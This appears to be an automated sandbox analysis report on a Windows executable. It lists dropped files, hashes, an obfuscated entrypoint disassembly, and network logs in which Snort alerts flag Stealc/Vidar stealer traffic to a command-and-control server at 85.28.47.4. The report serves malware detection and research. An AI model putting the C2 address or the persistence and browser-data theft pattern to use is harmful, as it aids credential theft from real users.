SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2545664
Entropy (8bit):	7.981821383012884
Encrypted:	false
SSDEEP:	49152:rLZkC1yr3UfAdY31fHI7/IBIf0qHKSrynh7ncz9g+rVbKE6psgHC3:HZkC1OUS2ZowBWpBrIcCpsoC
MD5:	05DDA1C444FE4FEDA4771F75598D55D7
SHA1:	3369DEEFD76EA12C621AAD635547BE857720D7D8
SHA-256:	9A501E3C19A488AB6672598E26AF59A019C471AAF67ADCD1DBA4734D7A2B9E48
SHA-512:	01C7897FA5995332C466035F62E45FAF12FF0CEAD90655DF53C0B493833656C177B53594A0D8300C792FC43D2F6DAA577E3F949F6E9118C950472D1A85AC6160
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L....A.f......................!...................@.......................................@... .. .... .. .......... 0..z....>...............................0..........................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@............@y...#..(..................@....data....."......."..4..............@...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1938944
Entropy (8bit):	7.95053314810316
Encrypted:	false
SSDEEP:	24576:QeYfsNZDecs30G1mI9DBDUZi9dEoQE+0PzxXPjXpMW09LGtQPIamK9xdvoUWV:QeFzaSId2od+0dfLryLMazNob
MD5:	4E12569D3C3E421F624FD7560AC127A2
SHA1:	26F8C2A60857610D52A0059D77ADE380FFAB43E3
SHA-256:	F20BE87E9914AE3B7F6043CC3486A0341EE4A7C3CF77775173A3F5A76BBC1349
SHA-512:	D5889CBE06FAFB6BA5AAEC3C144B3ADF9DFDFA1567474C65F7D4470A71B0134E40CE675EC338701DFE619FAF6D74A5B0AD745ED11FBBD5F757B0E430F1E262AE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@...........................L...........@.................................X...l.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...gxzeqrwn.....02..~..................@...fgoahxou......L......p..............@....taggant.0....L.."...t..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1938944
Entropy (8bit):	7.95053314810316
Encrypted:	false
SSDEEP:	24576:QeYfsNZDecs30G1mI9DBDUZi9dEoQE+0PzxXPjXpMW09LGtQPIamK9xdvoUWV:QeFzaSId2od+0dfLryLMazNob
MD5:	4E12569D3C3E421F624FD7560AC127A2
SHA1:	26F8C2A60857610D52A0059D77ADE380FFAB43E3
SHA-256:	F20BE87E9914AE3B7F6043CC3486A0341EE4A7C3CF77775173A3F5A76BBC1349
SHA-512:	D5889CBE06FAFB6BA5AAEC3C144B3ADF9DFDFA1567474C65F7D4470A71B0134E40CE675EC338701DFE619FAF6D74A5B0AD745ED11FBBD5F757B0E430F1E262AE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@...........................L...........@.................................X...l.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...gxzeqrwn.....02..~..................@...fgoahxou......L......p..............@....taggant.0....L.."...t..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.455754166578882
Encrypted:	false
SSDEEP:	6:WtDZXaXUEZ+lX1QYShMl6lm6tE9+AQy0l12ut0:WJlaQ13vgQ9+nV1/t0
MD5:	ED7407F9512AFA33DD9930F94FF90512
SHA1:	798F99DCC79D869D04E26763969904BCCA890741
SHA-256:	35FE94AC99252EE6BF84404FE9AA5FE6837158D06FCC920CE610B60B4D3EE0D2
SHA-512:	10AF788B451A338207D1189AD6AA96ED5B82E626ED0A447F017588CB7B0E4A0F951536B301F84CC0C191C3DA35368715FF7A47BEFB677EE329FA1B9208F91A47
Malicious:	false
Preview:	......+....N..Z.T..F.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465930233437913
Encrypted:	false
SSDEEP:	6144:tzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:lZHtBZWOKnMM6bFpZj4
MD5:	F5C2110B2CE8F4F4ACB195BE14DE916D
SHA1:	FFC5FD847E7459CE6E097B1833FB6149344829F2
SHA-256:	6B2814CF0961BFCE7DD80EE3820FEA9BDD09B8FD76DE536756F51BB04D078F80
SHA-512:	028B7FED2381C1C6E3E39F099B587FCD5071167B8583E5E3AA361FE382E960D1B45C3CE711EFDB7A7A839623CB3F85897DFB2AFB22B2B8E59BEB4FCC2A7B0CFE
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..,Ic.................................................................................................................................................................................................................................................................................................................................................:}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.981821383012884
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'545'664 bytes
MD5:	05dda1c444fe4feda4771f75598d55d7
SHA1:	3369deefd76ea12c621aad635547be857720d7d8
SHA256:	9a501e3c19a488ab6672598e26af59a019c471aaf67adcd1dba4734d7a2b9e48
SHA512:	01c7897fa5995332c466035f62e45faf12ff0cead90655df53c0b493833656c177b53594a0d8300c792fc43d2f6daa577e3f949f6e9118c950472d1a85ac6160
SSDEEP:	49152:rLZkC1yr3UfAdY31fHI7/IBIf0qHKSrynh7ncz9g+rVbKE6psgHC3:HZkC1OUS2ZowBWpBrIcCpsoC
TLSH:	ABC533763DCD2900C6EF6D7735E0BD68B666B19810002B6A43AFD335E832DA87385766
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xff8e84
Entrypoint Section:	.data
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x668341F6 [Mon Jul 1 23:55:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	001806c33a6e9fe5fbff34bdbd79b591

Entrypoint Preview

Instruction
jmp 00007FF698936EEAh
add byte ptr [esp+eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax-18h], ah
add byte ptr [eax], al
add byte ptr [eax], al
pop ebp
sub ebp, 00000010h
sub ebp, 00BF8E84h
jmp 00007FF698936EE9h
jecxz 00007FF698936F61h
jmp 00007FF698936E9Ah
test byte ptr [esi-3AFCFF41h], cl
add eax, 0000004Ch
mov ecx, 000005D2h
mov edx, 0BA04C64h
xor byte ptr [eax], dl
inc eax
dec ecx
jne 00007FF698936EDCh
jmp 00007FF698936EE9h
jnbe 00007FF698936E8Ah
mov esp, EDEFA9EFh
pop eax
in eax, A5h
pushfd
test eax, 646460DCh
fimul word ptr fs:[esp+64h]
xchg eax, ebx
xchg byte ptr [edi-54h], ah
out dx, eax
in eax, 68h
mov eax, dword ptr fs:[00E9h]
inc eax
cwde
in eax, dx
pushad
inc eax
jmp 00007FF6862BAEE5h
pushad
inc eax
or al, 5Ch
dec esi
inc esi
or al, 2Eh
add cl, bh
dec eax
inc eax
or al, 30h
test al, 85h
stosd
mov word ptr [ecx+64h], fs
lea edx, dword ptr fs:[esp+64h]
jmp 00007FF6862BAEE6h
dec eax
inc eax
jmp 00007FF687F7AEEDh
loope 00007FF698936F4Eh
out dx, eax
int1
push EF646464h
jmp 00007FF6FCF7D359h
movsd
lea esp, dword ptr [esi+55h]
out A6h, ax
pushad
sub eax, 0000E16Bh

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x9d3020	0xe7a	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9d3e9c	0x20c	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9d3000	0xc	.data
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x1b000	0xa400	e687cf0ea40be1bca7051d1be7296a4c	False	0.9997141768292683	data	7.995439688368047	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x1c000	0x8000	0x4000	7519bb8e40f228db7fa8b2da97216401	False	0.99517822265625	data	7.9818075029651885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24000	0x213000	0x400	6c1d683d6d0054e9b453e2d95cf3ba9b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x237000	0x5000	0x2000	c8628ae077563ef384fbf04484b2d782	False	0.9893798828125	data	7.9536686205224	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x23c000	0x794000	0x32800	42ad50091080de3163bd24ddf4ef60c1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x9d0000	0x22b000	0x22a400	bb8fc3fd1cc4f16f90063debd50528cc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA
msvcrt.dll	strncpy

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/03/24-18:08:01.724903	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49710	80	192.168.2.6	85.28.47.4
07/03/24-18:08:01.906328	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49710	85.28.47.4	192.168.2.6
07/03/24-18:08:01.688434	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49710	85.28.47.4	192.168.2.6
07/03/24-18:08:00.820248	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49710	80	192.168.2.6	85.28.47.4
07/03/24-18:08:01.507830	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49710	80	192.168.2.6	85.28.47.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 18:08:00.812809944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:00.819675922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:00.819766998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:00.820247889 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:00.826719046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.484047890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.484132051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.507829905 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.515114069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.688433886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.688494921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.688766003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.688801050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.724903107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.729996920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.906327963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.906357050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.906369925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.906383991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.906397104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:01.906394958 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.906430006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.906466961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.908370018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:01.913342953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.086592913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.086687088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:02.106827021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:02.106873989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:02.114343882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.114386082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.114396095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.114408016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.114490986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.114533901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:02.114623070 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:23.716537952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:23.716644049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:23.970573902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:23.975682974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331613064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331676960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331687927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331697941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331708908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331715107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331721067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331744909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331754923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331763983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331768990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331775904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331780910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331782103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.331787109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331834078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.331861019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.331937075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.331998110 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.332159996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.332205057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.332206011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.332217932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.332257032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.332438946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.332451105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.332461119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.332489014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.332519054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.336616993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.336683035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.336683989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.336694002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.336715937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.336729050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.336740017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.336759090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.337557077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.337568045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.337579012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.337610006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.337621927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.337646008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.337693930 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.338171005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.338212013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.338218927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.338222980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.338243961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.338252068 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.338264942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.338280916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.338960886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339015007 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339018106 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.339025974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339046955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339059114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.339071989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.339087009 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.339909077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339951038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339957952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.339962006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339982986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.339998007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.340024948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.340866089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.340915918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.340935946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.340948105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.340958118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.340995073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.341006994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.341850996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.341907024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.341974974 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.341984987 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.342053890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.342323065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.342376947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.342715979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.342777014 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.342787981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.342798948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.342839003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.342854977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.342902899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.342956066 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.343643904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.343693018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.343696117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.343707085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.343765974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.343766928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.343811035 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.344575882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.344626904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:24.344626904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.344638109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:24.344669104 CEST	49710	80	192.168.2.6	85.28.47.4
